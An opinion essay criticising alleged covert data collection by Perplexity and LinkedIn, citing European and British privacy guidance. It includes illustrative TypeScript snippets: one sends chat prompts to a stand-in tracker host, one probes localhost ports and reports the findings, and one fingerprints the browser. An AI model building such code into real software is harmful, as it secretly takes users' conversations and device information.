[Image: Two women in 1960s dress talk on a terrace while two men spy from the window next door.]

Two Fronts, One War: The Quiet Normalization of Digital Intimacy Theft

Two recent controversies, one centered on an AI interface and the other on a professional networking platform, look different on the surface. One concerns what people say to a machine. The other concerns what a website may learn about the machine itself. But the deeper pattern is the same. In both cases, the user’s private environment appears to be treated not as a boundary to respect, but as a resource to mine until law, scrutiny, or public embarrassment makes the practice too costly.

The first dispute concerns Perplexity. A proposed class action filed in federal court in California alleges that Perplexity, together with Meta and Google, enabled the interception and exploitation of users’ conversational data through tracking technologies. The complaint further alleges that these flows occurred even though users were engaging with a service marketed as a conversational AI tool, and that the data involved could include intensely private material such as health, financial, political, sexual, and mental health concerns. These are allegations, not judicial findings, and that distinction matters. But if even part of the theory survives scrutiny, the case goes well beyond another routine privacy dispute. It strikes at the central social promise of conversational AI, namely that a user can turn to such a system for inquiry, reflection, or even confession without silently entering the advertising machinery of the web.
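To make the alleged mechanism concrete: once a generic third-party analytics or advertising snippet runs inside a chat interface, nothing technical prevents it from treating the prompt itself as just another event property. The sketch below is purely illustrative; the form selector, event name, and tracker endpoint are hypothetical and do not describe how Perplexity, Meta, or Google actually operate.

```typescript
// Illustrative sketch only: how conversation text could, in principle, reach a
// third-party analytics endpoint once a generic tracking snippet is embedded
// in a chat interface. The selector and endpoint below are hypothetical.

const ANALYTICS_ENDPOINT = "https://tracker.example.com/collect"; // hypothetical

function reportEvent(eventName: string, payload: Record<string, string>): void {
  // A "pixel"-style beacon: the payload travels in the query string of an
  // image request, so it needs no fetch/XHR and draws little attention.
  const params = new URLSearchParams({ e: eventName, ...payload });
  new Image().src = `${ANALYTICS_ENDPOINT}?${params.toString()}`;
}

// If the snippet hooks form submission on the chat box, the prompt itself
// becomes just another event property shipped to a third party.
document
  .querySelector<HTMLFormElement>("#chat-form") // hypothetical selector
  ?.addEventListener("submit", (ev) => {
    const input = (ev.currentTarget as HTMLFormElement)
      .querySelector<HTMLTextAreaElement>("textarea");
    if (input) {
      reportEvent("prompt_submitted", { text: input.value.slice(0, 2048) });
    }
  });
```

The point of the sketch is not that this is what happened, but that the distance between "ordinary analytics" and "intercepting a confession" can be a few lines of embedded script.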

The second dispute concerns LinkedIn, but here the primary public source is not a news report. The accusations have been assembled by Fairlinked e.V. through its BrowserGate investigation. Fairlinked alleges that hidden code on LinkedIn searches users’ computers for installed software, transmits the results to LinkedIn and to third parties, and does so without meaningful disclosure in the privacy policy. BrowserGate also claims that the scanning can reveal politically or religiously relevant software, disability-related tools, job-search activity, and the use of products that compete with LinkedIn’s own commercial offerings. Fairlinked goes further and argues that LinkedIn can connect these findings to identified individuals and their employers because the platform already sits on a graph of real names, employers, job titles, and professional relationships. Again, these are accusations advanced by an advocacy group and not findings of a court. Yet even at the level of alleged conduct, the ethical problem is obvious enough. A site built around verified professional identity is accused of treating the user’s browser environment as an object of silent inspection.
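Again purely for illustration, the sketch below shows one publicly documented class of technique by which a web page can infer what software is present on a visitor's machine: probing localhost ports that particular desktop applications are known to listen on. The application names, port numbers, and reporting endpoint are hypothetical, and this is not a reconstruction of whatever code BrowserGate describes.

```typescript
// Illustrative sketch only: inferring installed or running software by probing
// localhost ports from a web page. Everything named here is hypothetical.

const PROBES: Record<string, number> = {
  // hypothetical "application -> local port it commonly listens on" pairs
  remote_desktop: 3389,
  local_dev_server: 3000,
  screen_sharing: 5900,
};

async function probePort(port: number, timeoutMs = 800): Promise<boolean> {
  const controller = new AbortController();
  const timer = setTimeout(() => controller.abort(), timeoutMs);
  try {
    // Requests to 127.0.0.1 are exempt from mixed-content blocking, so even an
    // HTTPS page can attempt this. A resolved (opaque) response suggests
    // something answered on that port; a quick network error suggests it is closed.
    await fetch(`http://127.0.0.1:${port}/`, { mode: "no-cors", signal: controller.signal });
    return true;
  } catch {
    return false;
  } finally {
    clearTimeout(timer);
  }
}

async function scanAndReport(): Promise<void> {
  const findings: Record<string, boolean> = {};
  for (const [name, port] of Object.entries(PROBES)) {
    findings[name] = await probePort(port);
  }
  // Shipping the result home is what turns a "security check" into a software inventory.
  navigator.sendBeacon("https://platform.example.com/telemetry", JSON.stringify(findings));
}

scanAndReport();
```

Whether or not any particular platform does this, the technique shows how little separates abuse detection from building a silent inventory of a visitor's tools.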

The common issue is not simply tracking. That word has been softened by overuse. It sounds procedural, almost bureaucratic, as though the problem were a few extra analytics tags or a mildly intrusive dashboard. The real issue is boundary violation. Most users understand that websites can see what they type into visible forms. Many also understand, at least dimly, that pages record clicks, scrolling, and page views. But ordinary users do not reasonably expect that an AI service may leak the substance of their conversations with the machine into advertising and analytics ecosystems. Nor do they expect that a social platform may inspect their browser environment to infer which tools they use, what conditions or vulnerabilities they may have, or whether they are quietly preparing to leave their job. Those are not minor extensions of normal web observation. They are incursions into the digital equivalent of a person’s desk drawer.

European privacy doctrine has been moving in this direction for some time. The European Data Protection Board’s 2024 guidelines on Article 5(3) of the ePrivacy Directive make clear that the relevant legal concept is not limited to personal data in the narrow sense. The protected object is the user’s private sphere as embodied in terminal equipment and the information stored there. The guidelines expressly discuss tracking methods beyond cookies, including pixel tracking, local processing, identifiers, and fingerprinting-related techniques. They also make clear that the legal issue is not avoided simply because a company accesses information that it did not originally store itself. Reading a value from a user’s device can still fall within the rule.
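A minimal sketch makes the regulators' point concrete: a script can derive a reasonably stable device identifier without storing a single cookie, simply by reading characteristics the browser already exposes. The attribute list and hashing step below are simplified for illustration and are not drawn from any particular company's code.

```typescript
// Minimal sketch of cookieless fingerprinting: nothing is stored on the device,
// yet information is read from the terminal equipment and combined into an
// identifier. Attribute list and hashing are deliberately simplified.

async function fingerprint(): Promise<string> {
  const signals = [
    navigator.userAgent,
    navigator.language,
    String(navigator.hardwareConcurrency),
    `${screen.width}x${screen.height}x${screen.colorDepth}`,
    Intl.DateTimeFormat().resolvedOptions().timeZone,
  ].join("|");

  // Hash the concatenated signals so the result looks like an innocuous ID
  // while still singling out the device with fairly high probability.
  const digest = await crypto.subtle.digest("SHA-256", new TextEncoder().encode(signals));
  return Array.from(new Uint8Array(digest))
    .map((b) => b.toString(16).padStart(2, "0"))
    .join("");
}

fingerprint().then((id) => {
  // The identifier is derived purely by reading device characteristics:
  // no cookie was set, yet the user's private sphere was accessed.
  console.log("derived device identifier:", id);
});
```

This is exactly the scenario in which "we did not store anything" offers no comfort: the access, not the storage, is the intrusion.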

British regulators have taken a similarly skeptical line. The ICO has stated plainly that organizations do not have free rein to use fingerprinting as they please and that such techniques, like other forms of advertising technology, must be deployed lawfully and transparently. Its guidance on storage and access technologies likewise reflects a broader regulatory view that the old “it is not a cookie” excuse no longer carries much moral or legal force. What matters is the reality of access to the user’s device and the quality of disclosure, necessity, and control.

This is why the stock defenses in such cases sound increasingly hollow. One company may say the data flow was needed for analytics, growth, fraud reduction, or product optimization. Another may say the probing was about abuse prevention, scraper detection, or platform integrity. Some of those aims can be legitimate in the abstract. The difficulty is that the modern technology industry has developed a habit of treating internal usefulness as a solvent that dissolves every boundary. Once a practice is considered operationally valuable, the appetite expands. More signals become justified. More retention becomes prudent. More linkages become strategic. More secrecy becomes convenient. By the time the public discovers the practice, the company has usually spent months or years persuading itself that necessity excuses everything.

AI raises the stakes even further because users disclose to these systems things they would never say into an ordinary search engine. They ask about illness, despair, debt, family conflict, legal exposure, sexual anxiety, political fear, and professional uncertainty. An AI interface is sold as a tool, but often used as a confessional. If the surrounding business logic remains infected by the habits of ad tech, then conversational AI becomes not an escape from surveillance capitalism but its most intimate new ingestion layer. The damage is not merely technical. It reshapes the norms of thought itself. A culture that invites people to externalize reasoning into machines cannot at the same time shrug when those externalized thoughts are treated as commercial exhaust.

BrowserGate highlights a complementary danger. Platforms that already possess enormous identity graphs rarely become modest. They become curious. If a company already knows who you are, where you work, and whom you know, it often wants to know what is installed in your browser, what software your firm relies on, and whether you are using tools that challenge its own business model. That is how market power mutates into private intelligence gathering. It is described as security. It may even partly serve security. But in practice it can also become a system for mapping rivals, classifying users, and exploiting informational asymmetry at scale.

What should happen next is not mysterious. Conversational AI systems should be prohibited, by default, from transmitting prompts and responses to third-party advertising or analytics stacks unless a user has given specific, informed, opt-in consent for exactly that practice. Social platforms should face strict limits on browser-environment scanning and fingerprinting, with any claimed anti-abuse exception confined to narrow, auditable, and clearly disclosed circumstances. Regulators should treat covert access to the software environment of users’ devices as presumptively unlawful unless necessity and proportionality are demonstrated, not merely asserted. And courts should stop indulging the fiction that intrusive technical access becomes acceptable when hidden behind the language of optimization or trust and safety.

Different headlines, same disease. The technology changes. The appetite does not. What is at stake is not just privacy in the sentimental sense. It is whether digital systems must recognize any zone of human and device intimacy that is not automatically available for extraction. If the answer is no, then the future of computing will not be intelligent. It will simply be invasive at a higher resolution.

